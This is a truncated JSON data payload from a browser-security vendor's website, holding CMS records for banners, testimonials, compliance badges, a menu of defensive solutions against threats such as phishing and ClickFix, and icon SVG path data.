[{"data":1,"prerenderedAt":5403},["ShallowReactive",2],{"application-flags":3,"navbar":7,"always-visible-banner":36,"navbar-about-highlight":100,"navbar-resource-highlight":174,"trust-badges":218,"solution-nav":239,"fa-icon-sharp-regular-faFishingRod":379,"fa-icon-solid-faUserSecret":383,"fa-icon-sharp-regular-faLaptopCode":385,"fa-icon-solid-faTabletScreenButton":387,"fa-icon-solid-faThumbsUp":389,"fa-icon-solid-faPlugCircleXmark":391,"fa-icon-sharp-regular-faPuzzlePiece":393,"fa-icon-solid-faFileCircleXmark":395,"fa-icon-solid-faGhost":398,"fa-icon-solid-faQrcode":401,"fa-icon-solid-faCookieBite":403,"fa-icon-sharp-regular-faUserSecret":405,"fa-icon-sharp-regular-faRadar":407,"fa-icon-sharp-regular-faSatelliteDish":409,"fa-icon-sharp-regular-faShieldCheck":411,"fa-icon-sharp-regular-faBrainCircuit":413,"fa-icon-solid-faMobileScreenButton":415,"fa-icon-brands-faChrome":417,"fa-icon-solid-faDisplay":419,"fa-icon-solid-faFilter":421,"fa-icon-solid-faCloudArrowUp":423,"blog\u002Fthe-state-of-clickfix-by-detection-data":425,"blog-topics":5010},[4],{"name":5,"enabled":6},"maintenanceMode",false,[8],{"createdDate":9,"id":10,"name":11,"modelId":12,"published":13,"meta":14,"query":22,"data":23,"variations":28,"lastUpdated":29,"firstPublished":30,"testRatio":31,"createdBy":32,"lastUpdatedBy":33,"folders":34,"rev":35},1742208588866,"1c7a4e423bf54ac1a328bb4063459ef2","Banner","1c6207a5f24948ab82d4a0b17f251193","published",{"breakpoints":15,"hasAutosaves":19,"kind":20,"lastPreviewUrl":21},{"medium":16,"small":17,"xsmall":18},768,640,320,true,"data","",[],{"link":24,"text":25,"type":26,"url":27},{},"Get our latest report analyzing browser attack techniques in 2026","web-banner","https:\u002F\u002Fpushsecurity.com\u002Fresources\u002Fbrowser-attacks-report",{},1774258294825,1742208637545,1,"CydmZnOWU1XuAaLhEDCoYNM4Z8W2","jKjF9r5jcvXU8tzZEfFQm31Iyvr2",[],"3meglclz7li",{"createdBy":37,"createdDate":38,"data":39,"folders":87,"id":88,"lastUpdated":89,"lastUpdatedBy":37,"meta":90,"modelId":94,"name":95,"published":13,"query":96,"testRatio":31,"variations":97,"firstPublished":98,"stageModifiedSincePublish":6,"lastUpdateSource":60,"rev":99},"ST0tXQM8slWpFrmioqKHmENB2qe2",1774965361051,{"ctaText":40,"text":41,"url":21,"blocks":42,"state":83},"ewrererw","testrfesssssssssss",[43,71],{"@type":44,"@version":45,"id":46,"component":47,"responsiveStyles":61},"@builder.io\u002Fsdk:Element",2,"builder-ca12c06a52de41d7b8743da53118cd38",{"name":48,"tag":48,"options":49,"isRSC":60},"TopBannerContent",{"text":50,"ctaText":51,"url":52,"mainText":53,"cta":56,"styleVariant":59,"showMonsters":19},"New Webinar Series: Join John Hammond, Troy Hunt, and Matt Johansen for the State of Browser Attacks","Save Your Spot","https:\u002F\u002Fpushsecurity.com\u002Fwebinar\u002Fstate-of-browser-security",{"content":54,"fontSize":55},"\u003Cp class=\"\">Shadow AI monsters are lurking in the dark! Bust them all in our retro-inspired arcade game.\u003C\u002Fp>","text-base",{"content":57,"fontSize":55,"url":58},"\u003Cp class=\"\">Press start &gt;&gt;\u003C\u002Fp>","https:\u002F\u002Fpushsecurity.com\u002Flp\u002Fshadow-ai-busters","arcade",null,{"large":62},{"display":63,"flexDirection":64,"position":65,"flexShrink":66,"boxSizing":67,"marginTop":68,"marginBottom":68,"fontSize":69,"fontWeight":70},"flex","column","relative","0","border-box",".56rem","1.125rem","700",{"id":72,"@type":44,"tagName":73,"properties":74,"responsiveStyles":78},"builder-pixel-ud5251qa13","img",{"src":75,"aria-hidden":76,"alt":21,"role":77,"width":66,"height":66},"https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fpixel?apiKey=f3a1111ff5be48cdbb123cd9f5795a05","true","presentation",{"large":79},{"height":66,"width":66,"display":80,"opacity":66,"overflow":81,"pointerEvents":82},"block","hidden","none",{"deviceSize":84,"location":85},"large",{"path":21,"query":86},{},[],"fd266d0172cc47429be7ad10f48c99ad",1789552629325,{"breakpoints":91,"hasAutosaves":19,"hasErrors":6,"hasLinks":6,"kind":92,"lastPreviewUrl":93},{"medium":16,"small":17,"xsmall":18},"component","https:\u002F\u002Fsite.dev.pushsecurity.com\u002F?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2Cadmin%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests%2CmergePullRequests%2CfusionHostingPublish%2CfusionHostingRevokeAiToken&builder.user.role.name=Admin&builder.user.role.id=admin&builder.cachebust=true&builder.preview=always-visible-banner&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.always-visible-banner=fd266d0172cc47429be7ad10f48c99ad&builder.overrides.fd266d0172cc47429be7ad10f48c99ad=fd266d0172cc47429be7ad10f48c99ad&builder.options.locale=Default","0678d178ec8b41efb8a23c09dba7874d","always visible banner",[],{},1774968080803,"hmgaj76b2tl",[101,137],{"createdBy":32,"createdDate":102,"data":103,"folders":126,"id":127,"lastUpdated":128,"lastUpdatedBy":32,"meta":129,"modelId":131,"name":132,"published":13,"query":133,"stageModifiedSincePublish":6,"testRatio":31,"variations":134,"firstPublished":135,"rev":136},1776247359804,{"link":104,"testimonial":105,"testimonialLink":125,"type":108},{},{"@type":106,"id":107,"model":108,"value":109},"@builder.io\u002Fcore:Reference","f028f2b685bb47cd8bf9e82a26dd5a79","testimonial",{"query":110,"folders":111,"createdDate":112,"id":107,"name":113,"modelId":114,"published":13,"data":115,"variations":119,"lastUpdated":120,"firstPublished":121,"testRatio":31,"createdBy":37,"lastUpdatedBy":37,"meta":122,"rev":124},[],[],1735823466309,"We found Push to be more accurate when compared to competitors and the browser agent offered features that others couldn’t match.","42035571a56940ac98bff4544aa79aa5",{"author":116,"jobTitle":117,"quote":113,"image":118},"Jason Waits","\u003Cp>CISO at Inductive Automation\u003C\u002Fp>","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Ff04c0c0689ce4a89ac0f0708d78c0a07",{},1735910703862,1735823501152,{"kind":20,"lastPreviewUrl":21,"breakpoints":123,"hasAutosaves":19},{"small":17,"medium":16},"1ut9v9fomns","\u002Fcustomer-stories\u002Finductive-automation",[],"9136a8f18b3b4a6ba29b8653a99372b1",1776247404986,{"breakpoints":130,"hasAutosaves":6,"kind":20,"lastPreviewUrl":21},{"medium":16,"small":17,"xsmall":18},"20d9eaa352304613b3d1a794b400703d","testimonial-inductive-automation",[],{},1776247404973,"aos1ty9k5bi",{"createdBy":32,"createdDate":138,"data":139,"folders":166,"id":167,"lastUpdated":168,"lastUpdatedBy":32,"meta":169,"modelId":131,"name":164,"published":13,"query":171,"stageModifiedSincePublish":6,"testRatio":31,"variations":172,"firstPublished":173,"rev":136},1776255761419,{"description":140,"image":141,"link":142,"testimonial":145,"title":164,"type":165},"Learn about the latest techniques being used in the wild.","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F7b4a5ebf81d64e8c9d7fc35f6c96c4a9",{"text":143,"url":144},"Download now","\u002Fresources\u002Fbrowser-attacks-report",{"@type":106,"id":146,"model":108,"value":147},"192acbb1f9ca4cac918c0ec435a8bae3",{"query":148,"folders":149,"createdDate":150,"id":146,"name":151,"modelId":114,"published":13,"data":152,"variations":158,"lastUpdated":159,"firstPublished":160,"testRatio":31,"createdBy":37,"lastUpdatedBy":32,"meta":161,"rev":163},[],[],1728981467463,"Push does for identity what CrowdStrike did for the endpoint",{"video":153,"jobTitle":154,"author":155,"qoute":21,"quote":156,"image":157},"https:\u002F\u002Fcdn.builder.io\u002Fo\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F8b30e8ca50064058bbaef0f3c6164575%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=8b30e8ca50064058bbaef0f3c6164575&alt=media&optimized=true","\u003Cp>Deputy CISO at Microsoft\u003C\u002Fp>\u003Cp>Former LinkedIn, Slack, Palantir\u003C\u002Fp>","Geoff Belknap","Push does for identity what CrowdStrike did for the endpoint.","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F748f0ad0a5064a00a13f4721fcc8dea1",{},1742902158597,1728981782923,{"kind":20,"lastPreviewUrl":21,"breakpoints":162,"hasAutosaves":19},{"small":17,"medium":16},"a1vg7uuvavk","Report: 2026 Browser Attack Techniques","resource",[],"05a9322735fc427db12e2740e4302300",1776255810913,{"breakpoints":170,"hasAutosaves":6,"kind":20,"lastPreviewUrl":21},{"medium":16,"small":17,"xsmall":18},[],{},1776255810900,[175,197],{"createdBy":32,"createdDate":176,"data":177,"folders":187,"id":188,"lastUpdated":189,"lastUpdatedBy":32,"meta":190,"modelId":192,"name":164,"published":13,"query":193,"stageModifiedSincePublish":6,"testRatio":31,"variations":194,"firstPublished":195,"rev":196},1776256900280,{"description":140,"image":141,"link":178,"testimonial":179,"title":164,"type":165},{"text":143,"url":144},{"@type":106,"id":146,"model":108,"value":180},{"query":181,"folders":182,"createdDate":150,"id":146,"name":151,"modelId":114,"published":13,"data":183,"variations":184,"lastUpdated":159,"firstPublished":160,"testRatio":31,"createdBy":37,"lastUpdatedBy":32,"meta":185,"rev":163},[],[],{"video":153,"jobTitle":154,"author":155,"qoute":21,"quote":156,"image":157},{},{"kind":20,"lastPreviewUrl":21,"breakpoints":186,"hasAutosaves":19},{"small":17,"medium":16},[],"1f429607996e4e5fae8fe3f9b9610e55",1776256937553,{"breakpoints":191,"hasAutosaves":6,"kind":20,"lastPreviewUrl":21},{"medium":16,"small":17,"xsmall":18},"4829faa81e7c4ee8bd2d000e160e8d3c",[],{},1776256937540,"z2mr422914a",{"createdBy":32,"createdDate":198,"data":199,"folders":209,"id":210,"lastUpdated":211,"lastUpdatedBy":32,"meta":212,"modelId":192,"name":214,"published":13,"query":215,"stageModifiedSincePublish":6,"testRatio":31,"variations":216,"firstPublished":217,"rev":196},1776256949234,{"link":200,"testimonial":201,"testimonialLink":125,"type":108},{},{"@type":106,"id":107,"model":108,"value":202},{"query":203,"folders":204,"createdDate":112,"id":107,"name":113,"modelId":114,"published":13,"data":205,"variations":206,"lastUpdated":120,"firstPublished":121,"testRatio":31,"createdBy":37,"lastUpdatedBy":37,"meta":207,"rev":124},[],[],{"author":116,"jobTitle":117,"quote":113,"image":118},{},{"kind":20,"lastPreviewUrl":21,"breakpoints":208,"hasAutosaves":19},{"small":17,"medium":16},[],"ce043785b71b4ece98eac811ecf4ba10",1776256974140,{"breakpoints":213,"hasAutosaves":6,"kind":20,"lastPreviewUrl":21},{"medium":16,"small":17,"xsmall":18},"inductive-automation",[],{},1776256974130,[219,223,227,231,235],{"title":220,"logo":221,"createdDate":222},"SOC2","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb6727a5e00004d6e9e69fc3068b8b64c",1784291539953,{"title":224,"logo":225,"createdDate":226},"GDPR","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Ffe49f53211674deaa5a6640d929cdf42?format=webp",1784291672535,{"title":228,"logo":229,"createdDate":230},"Cyber essentials","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F53558c1045a342a7a28def960cd54ae7?format=webp",1784291702710,{"title":232,"logo":233,"createdDate":234},"ISO IEC 27001","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F578a404a61cf45db951a41fe3554d12d",1784291766222,{"title":236,"logo":237,"createdDate":238},"ISO IEC 27701","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fbe219844b13242fbba531959579a753c",1784291858848,[240,309,354],{"id":241,"label":242,"text":21,"navIcon":243,"items":244},"stop-browser-based-attacks","Stop browser-based attacks","solid:faShieldHalved",[245,250,255,260,265,270,275,280,285,289,294,299,304],{"title":246,"text":247,"url":248,"navIcon":249},"Phishing","Detect phishing behaviorally in the browser, regardless of the payload or delivery channel.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fzero-day-phishing","sharp-regular:faFishingRod",{"title":251,"text":252,"url":253,"navIcon":254},"Adversary-in-the-Middle","Detect and block MFA-bypassing AiTM phishing pages in real-time.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fadversary-in-the-middle-attacks","solid:faUserSecret",{"title":256,"text":257,"url":258,"navIcon":259},"ClickFix (and variants)","Intercept malicious copy and paste attacks at the point of interaction.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fclickfix-fix-variants","sharp-regular:faLaptopCode",{"title":261,"text":262,"url":263,"navIcon":264},"Device code phishing","Detect and block device code phishing kits designed to get around passkeys.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fdevice-code-phishing","solid:faTabletScreenButton",{"title":266,"text":267,"url":268,"navIcon":269},"Consent phishing","Detect and block malicious OAuth consent grants before access is authorized.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fconsent-phishing","solid:faThumbsUp",{"title":271,"text":272,"url":273,"navIcon":274},"Malicious OAuth integrations","Detect and block the root cause of SaaS supply chain attacks.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fmalicious-oauth-integrations","solid:faPlugCircleXmark",{"title":276,"text":277,"url":278,"navIcon":279},"Malicious browser extensions","Inventory, monitor, and block risky browser extensions.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fmalicious-browser-extensions","sharp-regular:faPuzzlePiece",{"title":281,"text":282,"url":283,"navIcon":284},"Malicious file downloads","Control which files users can download by type, source, and user group.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fmalicious-file-downloads","solid:faFileCircleXmark",{"title":286,"text":287,"url":288,"navIcon":284},"Infostealers","Detect infostealer delivery and respond to a compromise.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Finfostealer-malware",{"title":290,"text":291,"url":292,"navIcon":293},"Ghost logins","Surface hidden login paths that bypass SSO and expose accounts.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fghost-logins","solid:faGhost",{"title":295,"text":296,"url":297,"navIcon":298},"Mobile phishing (QR & SMS)","Detect phishing regardless of whether it arrives via email, SMS, or QR code.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fmobile-phishing-qr-code-sms","solid:faQrcode",{"title":300,"text":301,"url":302,"navIcon":303},"Credential stuffing","Identify reused and compromised credentials across SaaS logins.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fcredential-stuffing","custom:credentialStuffing",{"title":305,"text":306,"url":307,"navIcon":308},"Session hijacking","Detect and respond to stolen session token replay with browser session markers.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fsession-hijacking","solid:faCookieBite",{"id":310,"label":311,"text":21,"navIcon":312,"items":313},"achieve-security-outcomes","Achieve security outcomes","solid:faCheckToSlot",[314,319,324,329,334,339,344,349],{"title":315,"text":316,"url":317,"navIcon":318},"Stop account takeover","Stop ATO with stolen credential and compromised token detection.","\u002Fsolution\u002Fachieve-security-outcomes\u002Fstop-account-takeover","sharp-regular:faUserSecret",{"title":320,"text":321,"url":322,"navIcon":323},"Harden unmanaged identities","Harden access paths with visibility, detection, and guardrails.","\u002Fsolution\u002Fachieve-security-outcomes\u002Fharden-unmanaged-identities","sharp-regular:faRadar",{"title":325,"text":326,"url":327,"navIcon":328},"Investigate browser-related incidents","Investigate and respond faster with unique browser telemetry.","\u002Fsolution\u002Fachieve-security-outcomes\u002Finvestigate-browser-related-incidents","sharp-regular:faSatelliteDish",{"title":330,"text":331,"url":332,"navIcon":333},"Secure shadow SaaS","See and control shadow SaaS in the browser.","\u002Fsolution\u002Fachieve-security-outcomes\u002Fsecure-shadow-saas","sharp-regular:faShieldCheck",{"title":335,"text":336,"url":337,"navIcon":338},"Secure AI","See and control AI apps in the browser.","\u002Fsolution\u002Fachieve-security-outcomes\u002Fsecure-ai","sharp-regular:faBrainCircuit",{"title":340,"text":341,"url":342,"navIcon":343},"Secure BYOD","Extend consistent browser-based protection to unmanaged devices.","\u002Fsolution\u002Fachieve-security-outcomes\u002Fsecure-bring-your-own-device","solid:faMobileScreenButton",{"title":345,"text":346,"url":347,"navIcon":348},"Secure Chromebooks","Secure browser activity on Chromebooks without endpoint agents.","\u002Fsolution\u002Fachieve-security-outcomes\u002Fsecure-chromebooks","brands:faChrome",{"title":350,"text":351,"url":352,"navIcon":353},"Investigate and stop data loss","Detect and prevent data loss across AI tools, apps, and sessions.","\u002Fsolution\u002Fachieve-security-outcomes\u002Finvestigate-and-stop-data-loss","custom:investigateAndStopDataLoss",{"id":355,"label":356,"text":21,"navIcon":357,"items":358},"tool-replacements","Tool replacements","solid:faScrewdriverWrench",[359,364,369,374],{"title":360,"text":361,"url":362,"navIcon":363},"Remote browser isolation","Detect attacks that look like normal browsing.","\u002Fsolution\u002Ftool-replacements\u002Fremote-browser-isolation","solid:faDisplay",{"title":365,"text":366,"url":367,"navIcon":368},"Secure web gateways","Detect attacks inside the browser after SWGs allowed the connection.","\u002Fsolution\u002Ftool-replacements\u002Fsecure-web-gateways","solid:faFilter",{"title":370,"text":371,"url":372,"navIcon":373},"Cloud access security broker","Catch browser-based identity threats in real time, not after the fact.","\u002Fsolution\u002Ftool-replacements\u002Fcloud-access-security-broker","solid:faCloudArrowUp",{"title":375,"text":376,"url":377,"navIcon":378},"Security awareness training","Block real phishing instead of training users on simulations.","\u002Fsolution\u002Ftool-replacements\u002Fsecurity-awareness-training","custom:securityAwareness",{"w":380,"h":381,"d":382},448,512,"M284.6 0l91.4 0 0 160-48 0 0-112-36.6 0-203.4 58.1 0 181.9 40 0 0 224-128 0 0-224 40 0 0-218.1 17.4-5 224-64 3.2-.9zM80 336l-32 0 0 128 32 0 0-128zm176 8c0-76.8 64-136 96-152 32 16 96 75.2 96 152 0 32-16 80-64 112l32 40 0 16-128 0 0-16 32-40c-48-32-64-80-64-112zm128-32a24 24 0 1 0 -48 0 24 24 0 1 0 48 0z",{"w":380,"h":381,"d":384},"M171-16c-36.4 0-57.8 58.3-68.3 112L72 96c-13.3 0-24 10.7-24 24s10.7 24 24 24l24 0 0 32c0 17 3.3 33.2 9.3 48l-9.3 0 0 0-20.5 0c-15.2 0-27.5 12.3-27.5 27.5 0 3 .5 5.9 1.4 8.7l28.9 86.6C40.2 379.6 16 428.1 16 482.3 16 498.7 29.3 512 45.7 512l356.6 0c16.4 0 29.7-13.3 29.7-29.7 0-54.2-24.2-102.7-62.3-135.4l28.9-86.6c.9-2.8 1.4-5.7 1.4-8.7 0-15.2-12.3-27.5-27.5-27.5l-20.5 0 0 0-9.3 0c6-14.8 9.3-31 9.3-48l0-32 24 0c13.3 0 24-10.7 24-24s-10.7-24-24-24l-30.7 0c-10.4-53.7-31.9-112-68.3-112-9.6 0-19 3.9-27.5 8.2-8.2 4.1-18.4 7.8-25.5 7.8s-17.3-3.7-25.5-7.8C190-12.1 180.6-16 171-16zm93.7 484.4l-24.8-70.9 27.9-32.5c2.7-3.2 4.2-7.2 4.2-11.4 0-9.7-7.8-17.5-17.5-17.5l-61 0c-9.7 0-17.5 7.8-17.5 17.5 0 4.2 1.5 8.2 4.2 11.4l27.9 32.5-24.8 70.9-57-180.4 35.7 0c18.4 10.2 39.5 16 62 16s43.6-5.8 62-16l35.7 0-57 180.4zM224 256c-34.7 0-64.2-22.1-75.3-53 5.7 3.2 12.3 5 19.3 5l12.4 0c16.5 0 31.1-10.6 36.3-26.2 2.3-7 12.2-7 14.5 0 5.2 15.6 19.9 26.2 36.3 26.2l12.4 0c7 0 13.6-1.8 19.3-5-11.1 30.9-40.6 53-75.3 53z",{"w":17,"h":381,"d":386},"M112 80l416 0 0 224 48 0 0-272-512 0 0 272 48 0 0-224zM48 404.1l0-4.1 544 0 0 4.1-27.9 27.9-488.2 0-27.9-27.9zM592 352l-592 0 0 72 56 56 528 0 56-56 0-72-48 0zM281 169l17-17-33.9-33.9c-6.1 6.1-27.8 27.8-65 65l-17 17c6.1 6.1 27.8 27.8 65 65l17 17 33.9-33.9c-9-9-25-25-48-48l31-31zM393 135l-17-17-33.9 33.9c9 9 25 25 48 48-23 23-39 39-48 48L376 281.9c6.1-6.1 27.8-27.8 65-65l17-17c-6.1-6.1-27.8-27.8-65-65z",{"w":380,"h":381,"d":388},"M0 64C0 28.7 28.7 0 64 0L384 0c35.3 0 64 28.7 64 64l0 384c0 35.3-28.7 64-64 64L64 512c-35.3 0-64-28.7-64-64L0 64zM256 432a32 32 0 1 0 -64 0 32 32 0 1 0 64 0zM384 64l-320 0 0 288 320 0 0-288z",{"w":381,"h":381,"d":390},"M80 160c17.7 0 32 14.3 32 32l0 256c0 17.7-14.3 32-32 32l-48 0c-17.7 0-32-14.3-32-32L0 192c0-17.7 14.3-32 32-32l48 0zM270.6 16C297.9 16 320 38.1 320 65.4l0 4.2c0 6.8-1.3 13.6-3.8 19.9L288 160 448 160c26.5 0 48 21.5 48 48 0 19.7-11.9 36.6-28.9 44 17 7.4 28.9 24.3 28.9 44 0 23.4-16.8 42.9-39 47.1 4.4 7.3 7 15.8 7 24.9 0 22.2-15 40.8-35.4 46.3 2.2 5.5 3.4 11.5 3.4 17.7 0 26.5-21.5 48-48 48l-87.9 0c-36.3 0-71.6-12.4-99.9-35.1L184 435.2c-15.2-12.1-24-30.5-24-50l0-186.6c0-14.9 3.5-29.6 10.1-42.9L226.3 43.3C234.7 26.6 251.8 16 270.6 16z",{"w":17,"h":381,"d":392},"M192-32c17.7 0 32 14.3 32 32l0 96 128 0 0-96c0-17.7 14.3-32 32-32s32 14.3 32 32l0 96 64 0c17.7 0 32 14.3 32 32s-14.3 32-32 32l0 48.7c-98.6 8.1-176 90.7-176 191.3 0 27.3 5.7 53.3 16 76.9l0 3.1c0 17.7-14.3 32-32 32s-32-14.3-32-32l0-66.7C165.2 398.1 96 319.1 96 224l0-64c-17.7 0-32-14.3-32-32S78.3 96 96 96l64 0 0-96c0-17.7 14.3-32 32-32zM496 256a144 144 0 1 1 0 288 144 144 0 1 1 0-288zm59.3 107.3c6.2-6.2 6.2-16.4 0-22.6s-16.4-6.2-22.6 0l-36.7 36.7-36.7-36.7c-6.2-6.2-16.4-6.2-22.6 0s-6.2 16.4 0 22.6l36.7 36.7-36.7 36.7c-6.2 6.2-6.2 16.4 0 22.6s16.4 6.2 22.6 0l36.7-36.7 36.7 36.7c6.2 6.2 16.4 6.2 22.6 0s6.2-16.4 0-22.6l-36.7-36.7 36.7-36.7z",{"w":381,"h":381,"d":394},"M201.1 57.3c-7 5.3-9.1 10.7-9.1 14.7 0 4.5 2.8 11.2 12.4 16.9l11.6 7 0 48.1-168 0 0 60.5c7.4-2.9 15.5-4.5 24-4.5 43.1 0 72 39.4 72 80s-28.9 80-72 80c-8.5 0-16.6-1.6-24-4.5l0 108.5 108.5 0c-2.9-7.4-4.5-15.5-4.5-24 0-43.1 39.4-72 80-72s80 28.9 80 72c0 8.5-1.6 16.6-4.5 24l60.5 0 0-168 48.1 0 7 11.6c5.8 9.6 12.4 12.4 16.9 12.4 4 0 9.5-2.1 14.7-9.1s9.3-17.9 9.3-30.9-4-23.8-9.3-30.9-10.7-9.1-14.7-9.1c-4.5 0-11.2 2.8-16.9 12.4l-7 11.6-48.1 0 0-120-120 0 0-48.1 11.6-7c9.6-5.8 12.4-12.4 12.4-16.9 0-4-2.1-9.5-9.1-14.7S245 48 232 48 208.2 52 201.1 57.3zM172.3 18.9C188.5 6.8 209.6 0 232 0S275.5 6.8 291.7 18.9 320 49.5 320 72c0 8.6-1.8 16.7-4.9 24l100.9 0 0 100.9c7.3-3.1 15.4-4.9 24-4.9 22.5 0 41 12.2 53.1 28.3s18.9 37.3 18.9 59.7-6.8 43.5-18.9 59.7-30.6 28.3-53.1 28.3c-8.6 0-16.7-1.8-24-4.9l0 148.9-168 0 0-49.3 8.2-7.2c5.4-4.7 7.8-10.3 7.8-15.5 0-9.9-10.7-24-32-24s-32 14.1-32 24c0 5.3 2.4 10.8 7.8 15.5l8.2 7.2 0 49.3-216 0 0-216 49.3 0 7.2 8.2c4.7 5.4 10.3 7.8 15.5 7.8 9.9 0 24-10.7 24-32s-14.1-32-24-32c-5.3 0-10.8 2.4-15.5 7.8L49.3 264 0 264 0 96 148.9 96c-3.1-7.3-4.9-15.4-4.9-24 0-22.5 12.2-41 28.3-53.1z",{"w":396,"h":381,"d":397},576,"M96 0C60.7 0 32 28.7 32 64l0 384c0 35.3 28.7 64 64 64l180 0c-22.7-31.5-36-70.2-36-112 0-100.6 77.4-183.2 176-191.3l0-38.1c0-17-6.7-33.3-18.7-45.3L290.7 18.7C278.7 6.7 262.5 0 245.5 0L96 0zM357.5 176L264 176c-13.3 0-24-10.7-24-24L240 58.5 357.5 176zM432 544a144 144 0 1 0 0-288 144 144 0 1 0 0 288zm59.3-180.7l-36.7 36.7 36.7 36.7c6.2 6.2 6.2 16.4 0 22.6s-16.4 6.2-22.6 0l-36.7-36.7-36.7 36.7c-6.2 6.2-16.4 6.2-22.6 0s-6.2-16.4 0-22.6l36.7-36.7-36.7-36.7c-6.2-6.2-6.2-16.4 0-22.6s16.4-6.2 22.6 0l36.7 36.7 36.7-36.7c6.2-6.2 16.4-6.2 22.6 0s6.2 16.4 0 22.6z",{"w":399,"h":381,"d":400},384,"M40.1 467.1l-11.2 9C25.7 478.6 21.8 480 17.8 480 8 480 0 472 0 462.2L0 192C0 86 86 0 192 0S384 86 384 192l0 270.2c0 9.8-8 17.8-17.8 17.8-4 0-7.9-1.4-11.1-3.9l-11.2-9c-13.4-10.7-32.8-9-44.1 3.9L269.3 506c-3.3 3.8-8.2 6-13.3 6s-9.9-2.2-13.3-6l-26.6-30.5c-12.7-14.6-35.4-14.6-48.2 0L141.3 506c-3.3 3.8-8.2 6-13.3 6s-9.9-2.2-13.3-6L84.2 471c-11.3-12.9-30.7-14.6-44.1-3.9zM160 192a32 32 0 1 0 -64 0 32 32 0 1 0 64 0zm96 32a32 32 0 1 0 0-64 32 32 0 1 0 0 64z",{"w":380,"h":381,"d":402},"M64 160l64 0 0-64-64 0 0 64zM0 80C0 53.5 21.5 32 48 32l96 0c26.5 0 48 21.5 48 48l0 96c0 26.5-21.5 48-48 48l-96 0c-26.5 0-48-21.5-48-48L0 80zM64 416l64 0 0-64-64 0 0 64zM0 336c0-26.5 21.5-48 48-48l96 0c26.5 0 48 21.5 48 48l0 96c0 26.5-21.5 48-48 48l-96 0c-26.5 0-48-21.5-48-48l0-96zM320 96l0 64 64 0 0-64-64 0zM304 32l96 0c26.5 0 48 21.5 48 48l0 96c0 26.5-21.5 48-48 48l-96 0c-26.5 0-48-21.5-48-48l0-96c0-26.5 21.5-48 48-48zM288 352a32 32 0 1 1 0-64 32 32 0 1 1 0 64zm0 64c17.7 0 32 14.3 32 32s-14.3 32-32 32-32-14.3-32-32 14.3-32 32-32zm96 32c0-17.7 14.3-32 32-32s32 14.3 32 32-14.3 32-32 32-32-14.3-32-32zm32-96a32 32 0 1 1 0-64 32 32 0 1 1 0 64zm-32 32a32 32 0 1 1 -64 0 32 32 0 1 1 64 0z",{"w":381,"h":381,"d":404},"M257.5 27.6c-.8-5.4-4.9-9.8-10.3-10.6-22.1-3.1-44.6 .9-64.4 11.4l-74 39.5C89.1 78.4 73.2 94.9 63.4 115L26.7 190.6c-9.8 20.1-13 42.9-9.1 64.9l14.5 82.8c3.9 22.1 14.6 42.3 30.7 57.9l60.3 58.4c16.1 15.6 36.6 25.6 58.7 28.7l83 11.7c22.1 3.1 44.6-.9 64.4-11.4l74-39.5c19.7-10.5 35.6-27 45.4-47.2l36.7-75.5c9.8-20.1 13-42.9 9.1-64.9-.9-5.3-5.3-9.3-10.6-10.1-51.5-8.2-92.8-47.1-104.5-97.4-1.8-7.6-8-13.4-15.7-14.6-54.6-8.7-97.7-52-106.2-106.8zM208 144a32 32 0 1 1 0 64 32 32 0 1 1 0-64zM144 336a32 32 0 1 1 64 0 32 32 0 1 1 -64 0zm224-64a32 32 0 1 1 0 64 32 32 0 1 1 0-64z",{"w":380,"h":381,"d":406},"M144-16l-48 112-48 0 0 48 48 0 0 32c0 17 3.3 33.2 9.3 48l-73.3 0 0 32 5.3 16 26.7 80-64 160 51.7 0 56.9-142.2 6.5-16.3c-1-3.1-10.1-30.3-27.2-81.5l51.4 0c22.6 19.9 52.2 32 84.7 32s62.1-12.1 84.7-32l51.4 0c-17.1 51.2-26.1 78.4-27.2 81.5l6.5 16.3 56.9 142.2 51.7 0-64-160 26.7-80 5.3-16 0-32-73.3 0c6-14.8 9.3-31 9.3-48l0-32 48 0 0-48-48 0-48-112-32 0-48 32-48-32-32 0zm80 272c-32.8 0-61-19.7-73.3-48l57.3 0 16-40 16 40 57.3 0c-12.3 28.3-40.5 48-73.3 48zm17.5 139.6l30.5-35.6 0-24-96 0 0 24 